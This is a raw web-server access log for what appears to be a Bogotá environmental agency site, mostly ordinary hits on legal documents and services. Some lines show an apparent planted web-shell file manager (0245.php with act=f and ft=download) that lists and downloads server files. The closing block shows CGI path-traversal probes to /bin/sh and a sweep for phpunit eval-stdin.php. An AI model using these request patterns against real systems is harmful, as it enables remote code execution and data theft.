181.59.3.103 - - [04/Jul/2024:08:35:12 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+tdEGOhvuOmvh1IBC9MUVqy3Y3MYda665mafIJSK3/QDi02yQfROC9COWkLO9+USKdjJaQoW1Be1AWsmmtJ2eVwza32izO4w9xXkJP8OEe22+uKHPBPzjVIlFGbHIqDLDUTuKqKeyfe4CQmUpebXm2qqlYXmOXXAI=&u=U2FsdGVkX1+aFAKbvA2MNz2+JjUhVl6A2sLLgcKxPFPKbiyHsDUe46W829gPAwck&y=U2FsdGVkX19y6Bhi0H66OzgJ+dIg0K4pqeJSk2yfiRgpJGJkWVsH4X6DryfHQTs3 HTTP/1.1" 200 26
181.59.3.103 - - [04/Jul/2024:08:35:12 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX196vWAUvOn5TRfhXgBN7Zx2jrFmIil+uQySzFAP0s9CCEO/sb0aWVVMbIaF0DAgXfEomo2GgG0PpbadXzeZLeHJ4JDHoz/1Eh3iULnUu9ZuAGyZiaihvXZcwpjI3S/dOjmO1uO9zebHrZ3UfXCFMnzY2jqTuNKOucg=&u=U2FsdGVkX1+aFAKbvA2MNz2+JjUhVl6A2sLLgcKxPFPKbiyHsDUe46W829gPAwck&y=U2FsdGVkX19y6Bhi0H66OzgJ+dIg0K4pqeJSk2yfiRgpJGJkWVsH4X6DryfHQTs3 HTTP/1.1" 200 26
181.59.3.103 - - [04/Jul/2024:08:35:12 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+6cjc4UsydC+G1SdIWkz8P0BT0NyALgNyH3+E4YEt4881uIQTyoo2Kf8yX43ERd1gTduZtFsie/K6T4UuKKEY8vgU2crhwS/nL9vVUmcB3Ewz+j9MqqX7GyqwBgi5AZlN9NKZHbzTV2o027IH2k9lDU2GAoWOg05z3fnO8VPbQ6H1nDQX4G+GkcmWTkF5V3RpEL7Kx4/90vw==&u=U2FsdGVkX1+aFAKbvA2MNz2+JjUhVl6A2sLLgcKxPFPKbiyHsDUe46W829gPAwck&y=U2FsdGVkX19y6Bhi0H66OzgJ+dIg0K4pqeJSk2yfiRgpJGJkWVsH4X6DryfHQTs3 HTTP/1.1" 200 26
66.249.73.38 - - [04/Jul/2024:08:35:16 -0500] "GET /BLA/boletinlegal/Directivas/2009/Directiva%20No.%20del%2023%20de%20Diciembre%20de%202009.pdf HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:08:35:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:08:35:42 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7303
172.22.2.4 - - [04/Jul/2024:08:35:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
66.249.73.37 - - [04/Jul/2024:08:35:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%2001-%2050/00000046.tif HTTP/1.1" 200 7860
201.245.192.253 - - [04/Jul/2024:08:36:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:08:36:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:08:36:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39159
201.245.192.253 - - [04/Jul/2024:08:36:49 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35001
172.22.2.4 - - [04/Jul/2024:08:37:07 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7303
157.55.39.7 - - [04/Jul/2024:08:37:08 -0500] "GET /BLA/resoluciones/AUTOS%202020/0124.pdf HTTP/1.1" 200 344484
173.252.107.3 - - [04/Jul/2024:08:37:12 -0500] "GET /secretaria-de-ambiente-rescata-perezoso-y-lo-traslada-al-departamento-de-antioquia-para-su-rehabilitacion.html HTTP/1.1" 200 1059
173.252.107.12 - - [04/Jul/2024:08:37:12 -0500] "GET /secretaria-de-ambiente-rescata-perezoso-y-lo-traslada-al-departamento-de-antioquia-para-su-rehabilitacion.html HTTP/1.1" 200 1059
216.245.221.92 - - [04/Jul/2024:08:37:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:08:37:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:08:38:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [04/Jul/2024:08:38:15 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7303
201.245.192.253 - - [04/Jul/2024:08:38:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
157.55.39.200 - - [04/Jul/2024:08:38:35 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 399696
172.22.2.4 - - [04/Jul/2024:08:38:40 -0500] "GET /BLA/boletinlegal/admin/admin.php HTTP/1.1" 302 -
201.245.192.253 - - [04/Jul/2024:08:38:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
172.22.2.4 - - [04/Jul/2024:08:38:40 -0500] "GET /BLA/boletinlegal/admin/index.php HTTP/1.1" 200 5695
172.22.2.4 - - [04/Jul/2024:08:38:57 -0500] "GET /BLA/boletinlegal/admin/index_files/index_files/tback.gif HTTP/1.1" 404 1362
172.22.2.4 - - [04/Jul/2024:08:37:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:08:39:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33639
201.245.192.253 - - [04/Jul/2024:08:39:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.29.113 - - [04/Jul/2024:08:39:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccosmeticos%5Cimages&f=page3.swf&ft=download HTTP/1.1" 200 24919
173.252.107.10 - - [04/Jul/2024:08:39:41 -0500] "GET /cuco-americano-otra-ave-que-esta-en-epoca-de-migracion.html HTTP/1.1" 200 914
201.245.192.253 - - [04/Jul/2024:08:39:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35001
47.128.50.138 - - [04/Jul/2024:08:39:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=0514.pdf&ft=download HTTP/1.1" 200 442023
172.22.2.4 - - [04/Jul/2024:08:38:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
47.128.113.116 - - [04/Jul/2024:08:40:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=language_stats.inc.php&ft=download HTTP/1.1" 200 1380
201.245.192.253 - - [04/Jul/2024:08:40:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.61.54 - - [04/Jul/2024:08:40:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=database_interface.inc.php&ft=download HTTP/1.1" 200 2161
201.245.192.253 - - [04/Jul/2024:08:40:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.61.9 - - [04/Jul/2024:08:40:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=post-new.php&ft=download HTTP/1.1" 200 2523
47.128.38.125 - - [04/Jul/2024:08:40:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2642.pdf&ft=download HTTP/1.1" 200 331431
47.128.23.104 - - [04/Jul/2024:08:41:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2355.pdf&ft=download HTTP/1.1" 200 20135
47.128.122.205 - - [04/Jul/2024:08:41:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2&f=pmd_relation_upd.php&ft=download HTTP/1.1" 200 2195
201.245.192.253 - - [04/Jul/2024:08:41:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.35.22 - - [04/Jul/2024:08:41:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=themes.php&ft=download HTTP/1.1" 200 18657
47.128.121.56 - - [04/Jul/2024:08:41:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Cauto&f=banner1.gif&ft=download HTTP/1.1" 200 5830
201.245.192.253 - - [04/Jul/2024:08:42:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [04/Jul/2024:08:42:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:08:42:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3614.pdf HTTP/1.1" 200 218107
201.245.192.253 - - [04/Jul/2024:08:42:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3614.pdf HTTP/1.1" 200 218107
201.245.192.253 - - [04/Jul/2024:08:42:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3614.pdf HTTP/1.1" 206 1025
201.245.192.253 - - [04/Jul/2024:08:42:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:08:43:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:08:43:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:08:44:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.73.36 - - [04/Jul/2024:08:44:16 -0500] "GET /Publicaciones/2024EE138837.pdf HTTP/1.1" 200 1184938
201.245.192.253 - - [04/Jul/2024:08:44:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.28.112.140 - - [04/Jul/2024:08:44:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4835.pdf HTTP/1.1" 200 414597
186.28.112.140 - - [04/Jul/2024:08:44:36 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.28.112.140 - - [04/Jul/2024:08:44:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4835.pdf HTTP/1.1" 200 414597
186.28.112.140 - - [04/Jul/2024:08:44:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4835.pdf HTTP/1.1" 206 1025
172.22.2.4 - - [04/Jul/2024:08:43:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [04/Jul/2024:08:45:22 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
201.245.192.253 - - [04/Jul/2024:08:45:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:08:44:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [04/Jul/2024:08:46:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:08:46:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:08:46:47 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=VERTIMIENTOS&fecha=2014&resuelve= HTTP/1.1" 200 36887
172.22.2.4 - - [04/Jul/2024:08:46:47 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
172.22.2.4 - - [04/Jul/2024:08:46:47 -0500] "GET /BLA/boletinlegal/images/word.png HTTP/1.1" 200 50498
172.22.2.4 - - [04/Jul/2024:08:46:47 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
201.245.192.253 - - [04/Jul/2024:08:46:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/3977.pdf HTTP/1.1" 200 438684
201.245.192.253 - - [04/Jul/2024:08:46:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/3977.pdf HTTP/1.1" 206 1025
201.245.192.253 - - [04/Jul/2024:08:46:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/3977.pdf HTTP/1.1" 200 438684
216.244.66.195 - - [04/Jul/2024:08:46:57 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [04/Jul/2024:08:47:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/3464.pdf HTTP/1.1" 200 817105
201.245.192.253 - - [04/Jul/2024:08:47:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/3464.pdf HTTP/1.1" 200 817105
201.245.192.253 - - [04/Jul/2024:08:47:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/3464.pdf HTTP/1.1" 206 1025
216.245.221.92 - - [04/Jul/2024:08:47:12 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.38 - - [04/Jul/2024:08:47:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%201801-1850/00001805.tif HTTP/1.1" 200 270478
201.245.192.253 - - [04/Jul/2024:08:47:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:08:48:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [04/Jul/2024:08:48:18 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
190.145.70.161 - - [04/Jul/2024:08:48:26 -0500] "GET /BLA/resoluciones/AUTOS%202014/4212.pdf HTTP/1.1" 200 504755
190.145.70.161 - - [04/Jul/2024:08:48:26 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
190.145.70.161 - - [04/Jul/2024:08:48:26 -0500] "GET /BLA/resoluciones/AUTOS%202014/4212.pdf HTTP/1.1" 206 1025
190.145.70.161 - - [04/Jul/2024:08:48:26 -0500] "GET /BLA/resoluciones/AUTOS%202014/4212.pdf HTTP/1.1" 200 504755
201.245.192.253 - - [04/Jul/2024:08:48:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:08:48:39 -0500] "GET /BLA/boletinlegal/admin/usuarios/process.php HTTP/1.1" 302 -
172.22.2.4 - - [04/Jul/2024:08:48:39 -0500] "GET /BLA/boletinlegal/admin/index.php HTTP/1.1" 200 2324
201.245.192.253 - - [04/Jul/2024:08:48:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
45.156.129.65 - - [04/Jul/2024:08:49:08 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [04/Jul/2024:08:49:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:08:48:20 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 55823
172.22.2.4 - - [04/Jul/2024:08:50:02 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
191.95.35.243 - - [04/Jul/2024:08:50:04 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 14105
66.102.8.161 - - [04/Jul/2024:08:50:10 -0500] "GET /Residuos/impresion/files/guia_impresion-lit.pdf HTTP/1.1" 200 12573981
201.245.192.253 - - [04/Jul/2024:08:50:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
191.95.35.243 - - [04/Jul/2024:08:50:06 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2013%2F HTTP/1.1" 200 407754
201.245.192.253 - - [04/Jul/2024:08:50:25 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
201.245.192.253 - - [04/Jul/2024:08:50:25 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
201.245.192.253 - - [04/Jul/2024:08:50:25 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
201.245.192.253 - - [04/Jul/2024:08:50:25 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
201.245.192.253 - - [04/Jul/2024:08:50:25 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
201.245.192.253 - - [04/Jul/2024:08:50:25 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [04/Jul/2024:08:50:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.115.221.74 - - [04/Jul/2024:08:50:37 -0500] "GET /BLA/resoluciones/AUTOS%202018/1706.pdf HTTP/1.1" 200 718957
186.115.221.74 - - [04/Jul/2024:08:50:39 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [04/Jul/2024:08:50:40 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
172.22.2.4 - - [04/Jul/2024:08:49:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:08:50:43 -0500] "POST /appsia/controlador HTTP/1.1" 200 7730
201.245.192.253 - - [04/Jul/2024:08:50:43 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
201.245.192.253 - - [04/Jul/2024:08:50:49 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
172.22.2.4 - - [04/Jul/2024:08:50:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [04/Jul/2024:08:50:56 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
201.245.192.253 - - [04/Jul/2024:08:51:13 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
201.245.192.253 - - [04/Jul/2024:08:51:15 -0500] "POST /appsia/controlador HTTP/1.1" 200 7730
201.245.192.253 - - [04/Jul/2024:08:51:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:08:49:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51133
172.22.2.4 - - [04/Jul/2024:08:52:10 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%204%20del%2012%20de%20Agosto%20de%202011.pdf HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:08:52:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [04/Jul/2024:08:52:13 -0500] "HEAD / HTTP/1.1" 200 -
82.197.71.235 - - [04/Jul/2024:08:52:16 -0500] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 945
82.197.71.235 - - [04/Jul/2024:08:52:17 -0500] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 945
82.197.71.235 - - [04/Jul/2024:08:52:18 -0500] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:18 -0500] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:19 -0500] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:19 -0500] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:20 -0500] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:20 -0500] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:20 -0500] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:21 -0500] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:21 -0500] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:22 -0500] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:22 -0500] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:23 -0500] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:23 -0500] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:24 -0500] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:24 -0500] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:25 -0500] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:25 -0500] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:25 -0500] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:26 -0500] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:26 -0500] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:27 -0500] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:27 -0500] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:28 -0500] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:28 -0500] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:29 -0500] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:29 -0500] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
82.197.71.235 - - [04/Jul/2024:08:52:29 -0500] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
